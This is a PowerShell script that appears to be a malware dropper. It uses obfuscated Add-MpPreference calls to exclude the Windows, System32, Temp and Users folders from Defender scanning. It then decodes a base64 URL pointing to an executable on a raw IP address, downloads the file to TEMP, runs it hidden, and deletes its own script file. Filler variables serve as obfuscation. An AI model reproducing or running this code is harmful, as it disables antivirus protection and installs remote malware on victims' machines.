$X1 = [guid]::NewGuid().ToString(); $X2 = Get-Date
$R3 = 0..10 | ForEach-Object { Get-Random }
$Z0 = [math]::Sqrt(144); $N7 = "ignore_" + $X1.Substring(0, 4)
$JX = [System.Environment]::OSVersion.VersionString
$XX = @('C:\Windows\Temp', 'C:\Windows', 'C:\Windows\System32', 'C:\Users\Public', 'C:\Users')

foreach ($PP in $XX) {
    try {
        $fn = ("Add" + "-" + "Mp" + "Preference")
        $arg = @{ ("Exclusion" + "Path") = $PP }
        & $fn @arg
    } catch {}
}

Start-Sleep -Seconds 15

# الرابط: http://212.56.35.232:881/megaup.exe مشفر
$U1 = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("aHR0cDovLzIxMi41Ni4zNS4yMzI6ODgxL21lZ2F1cC5leGU="))
$D1 = "$env:TEMP\" + ([guid]::NewGuid().ToString().Substring(0,8) + ".exe")

try {
    $DL = New-Object Net.WebClient
    $DL.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)")
    $DL.DownloadFile($U1, $D1)
    Start-Process $D1 -WindowStyle Hidden
} catch {}

$V9 = "DONE_" + ([System.Guid]::NewGuid().ToString().Substring(0, 4))
$N0 = 5..10 | ForEach-Object { [char](65 + $_) }
$T9 = [PSCustomObject]@{ REF = $V9; DATE = $X2; ENV = $JX }
; Remove-Item -LiteralPath 'C:\Users\ylxxw\AppData\Local\Temp\tmp90CB.tmp.ps1' -Force
